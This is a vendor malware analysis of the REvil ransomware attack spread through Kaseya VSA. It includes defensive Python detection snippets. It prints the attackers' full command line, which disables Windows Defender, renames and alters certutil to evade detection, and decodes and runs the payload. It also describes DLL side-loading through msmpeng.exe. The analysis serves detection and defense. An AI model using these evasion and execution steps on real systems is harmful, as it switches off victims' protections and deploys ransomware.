Kaseya VSA Supply Chain Ransomware Attacks (REvil Gang)

The ransomware distributed by exploiting a vulnerability in VSA (a cloud-based management service that can manage various patches and perform client monitoring) made by Kaseya, an IT solutions developer for enterprises and managed service providers (MSPs), turned out to be BlueCrab (Sodinokibi), a ransomware that is also being actively distributed in Korea. The figure below shows a desktop infected with the ransomware, which displays the same screen as the BlueCrab variant widely spread in Korea. However, the BlueCrab that is well known in Korea indiscriminately targets ordinary users with JavaScript files (*.JS) delivered via search engine sites such as Google and MS Bing, whereas the recently confirmed cases were targeted attacks that also differ in their operation method.

Figure 1. Desktop when infected by ransomware distributed via VSA, Kaseya

The REvil group, which is assumed to be behind the attacks, went through Kaseya’s supply chain for effective distribution. During the infection process, it used legitimate Microsoft files to neutralize Windows Defender and bypass anti-malware solutions, and then encrypted files discreetly.
The detailed infection information is as follows.

  • Initial Access: Supply Chain Compromise (TID: T1195)
    Exploits a vulnerability in Kaseya VSA to create the agent.crt file (a base64-encoded file) in the C:\kworking folder
  • Execution: Command and Scripting Interpreter (TID: T1059)
    Executes a PowerShell command by running Kaseya’s AgentMon.exe
  • Defense Evasion: Impair Defenses (TID: T1562) & Masquerading (TID: T1036) & Obfuscated Files or Information (TID: T1027) & Indicator Removal on Host (TID: T1070)
"C:\WINDOWS\system32\cmd.exe" /c ping -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
Table 1. Executed PowerShell command

When this PowerShell command is executed, the anti-malware product V3 can detect the ransomware in advance through its behavior detection feature, under the detection alias Execution/MDP.Behavior.M3792. The individual parts of the command and what they do are as follows:

  • DisableRealtimeMonitoring: Disables Windows Defender’s real-time protection
  • DisableIntrusionPreventionSystem: Disables Windows Defender’s download file scanning
  • DisableScriptScanning: Disables Windows Defender’s script scanning
  • EnableControlledFolderAccess Disabled: Allows access to controlled folders
  • EnableNetworkProtection AuditMode -Force: Disables network protection mode
  • MAPSReporting Disabled: Disables Microsoft Active Protection Service reporting
  • SubmitSamplesConsent NeverSend: Disables Windows Defender’s automatic sample submission
  • copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe: Copies the legitimate certutil.exe from its normal Windows path to C:\Windows\cert.exe
  • echo %RANDOM% >> C:\Windows\cert.exe: Appends random bytes to the end of the copied cert.exe file to bypass anti-malware detection of certutil.exe
  • C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe: Decodes the obfuscated file created through the vulnerability (agent.crt → agent.exe)
  • del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe: Deletes both the obfuscated file and the copied certutil.exe, then runs the decoded exe file
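The steps listed above can be matched in process-creation telemetry. The following is an added example, not AhnLab's detection logic: the record fields (Image, OriginalFileName, CommandLine) are assumed to follow Sysmon-style process-creation events, the finding names are hypothetical, and the sample records are constructed.

```python
import re

# Set-MpPreference arguments from the command on this page that weaken Defender.
WEAKEN = re.compile(
    r"-(?:Disable(?:RealtimeMonitoring|IntrusionPreventionSystem|IOAVProtection"
    r"|ScriptScanning)\s+\$true|EnableControlledFolderAccess\s+Disabled"
    r"|EnableNetworkProtection\s+AuditMode|MAPSReporting\s+Disabled"
    r"|SubmitSamplesConsent\s+NeverSend)", re.I)
COPY = re.compile(r"\bcopy\b.*\\certutil\.exe\s+(\S+)", re.I)
DECODE = re.compile(r"(\S+)\s+-decode\s+\S+\s+\S+\.exe\b", re.I)

def base(path):
    return path.strip('"').rsplit("\\", 1)[-1].lower()  # file name, lower-cased

def analyze(event):
    """Return the set of findings for one process-creation record."""
    found = set()
    cmd = event.get("CommandLine", "")
    if "set-mppreference" in cmd.lower() and WEAKEN.search(cmd):
        found.add("defender_weakened")
    for part in cmd.split("&"):  # cmd.exe chains the steps with '&'
        m = COPY.search(part)
        if m and base(m.group(1)) != "certutil.exe":
            found.add("certutil_copied_under_new_name")
        if DECODE.search(part):
            found.add("decode_to_exe")
    # Appended bytes change the hash, not the PE version resource (OriginalFileName).
    orig = event.get("OriginalFileName", "").lower()
    if orig == "certutil.exe" and base(event.get("Image", "")) != orig:
        found.add("renamed_certutil_running")
    return found

# Constructed records; the first command line is abridged from the one on this page.
EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe",
     "CommandLine": r'cmd.exe /c ping -n 4979 > nul & powershell.exe Set-MpPreference '
        r'-DisableRealtimeMonitoring $true -MAPSReporting Disabled & copy /Y '
        r'C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> '
        r'C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt '
        r'c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe'},
    {"Image": r"C:\Windows\cert.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": r"C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": r"certutil.exe -hashfile C:\temp\setup.exe SHA256"},
]

if __name__ == "__main__":
    print([sorted(analyze(e)) for e in EVENTS])
```

The OriginalFileName comparison is what survives the `echo %RANDOM% >>` step: a hash-based match on certutil.exe fails after the append, while the embedded version information still identifies the tool.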

  • Persistence: Hijack Execution Flow (TID: T1574)
    When executed, the exe file creates a legitimate Microsoft file (msmpeng.exe) and a DLL with BlueCrab functionality (mpsvc.dll) in %temp%. When msmpeng.exe is run, it calls ServiceCrtMain of mpsvc.dll. The DLL created by the attacker implements the ransomware features in that function, so the malicious behavior is performed by the legitimate msmpeng.exe that loaded the DLL.
Figure 2. Operation method of ransomware distributed via VSA, Kaseya

This process was likely used to bypass anti-malware detection by having the malicious behavior carried out by the legitimate process msmpeng.exe. Besides file detection, V3 products can detect the malware with the ‘process memory scan’ feature the moment the ransomware DLL module (mpsvc.dll) is executed. MDS and EDR products can also detect BlueCrab ransomware that uses this operation method without any issue.
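The msmpeng.exe / mpsvc.dll loading pattern described above can also be checked in image-load telemetry. The following is an added example, not AhnLab's product logic: the record fields are assumed to follow Sysmon-style image-load events, the Defender install roots are an assumption to adjust per environment, and the finding names and sample records are constructed.

```python
import ntpath

# Assumed install roots of the genuine MsMpEng.exe; adjust to your environment.
DEFENDER_ROOTS = (
    "c:\\program files\\windows defender\\",
    "c:\\programdata\\microsoft\\windows defender\\platform\\",
)

def check_image_load(ev):
    """Findings for one image-load record (Image, ImageLoaded, Signed, Signature)."""
    proc = ntpath.normcase(ev["Image"])
    mod = ntpath.normcase(ev["ImageLoaded"])
    if ntpath.basename(proc) != "msmpeng.exe":
        return []
    findings = []
    # The genuine binary is only expected under the Defender directories.
    if not proc.startswith(DEFENDER_ROOTS):
        findings.append("msmpeng_outside_defender_dir")
    if ntpath.basename(mod) == "mpsvc.dll":
        beside_exe = ntpath.dirname(mod) == ntpath.dirname(proc)
        by_microsoft = (ev.get("Signed") == "true"
                        and "microsoft" in ev.get("Signature", "").lower())
        # A valid signature from another publisher does not make the DLL trusted.
        if beside_exe and not by_microsoft:
            findings.append("untrusted_mpsvc_loaded_by_msmpeng")
    return findings

# Constructed records (paths, version and signer names are illustrative).
LOADS = [
    {"Image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.0.0-0\MsMpEng.exe",
     "ImageLoaded": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.0.0-0\MpSvc.dll",
     "Signed": "true", "Signature": "Microsoft Windows Publisher"},
    {"Image": r"C:\Windows\Temp\MsMpEng.exe",
     "ImageLoaded": r"C:\Windows\Temp\mpsvc.dll",
     "Signed": "false", "Signature": ""},
    {"Image": r"C:\Windows\Temp\MsMpEng.exe",
     "ImageLoaded": r"C:\Windows\Temp\mpsvc.dll",
     "Signed": "true", "Signature": "Example Publisher Ltd"},
    {"Image": r"C:\Windows\Temp\MsMpEng.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll",
     "Signed": "true", "Signature": "Microsoft Windows"},
]

if __name__ == "__main__":
    for ev in LOADS:
        print(ev["Image"], "->", check_image_load(ev))
```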

V3 Detection Status

  • Data/BIN.EncPe (2021.07.03.03)
  • Ransomware/Win.Sodinokibi (2021.07.03.03)
  • Ransomware/Win.REvil (2021.07.03.03)
  • Execution/MDP.Behavior.M3792 (Behavior Detection 2021.07.10.00)
  • Ransomware/Win.BlueCrab.XM120 (Memory Scan 2021.07.09.03)

[EDR Product Detection Screen]

[MDS Product Detection Status]
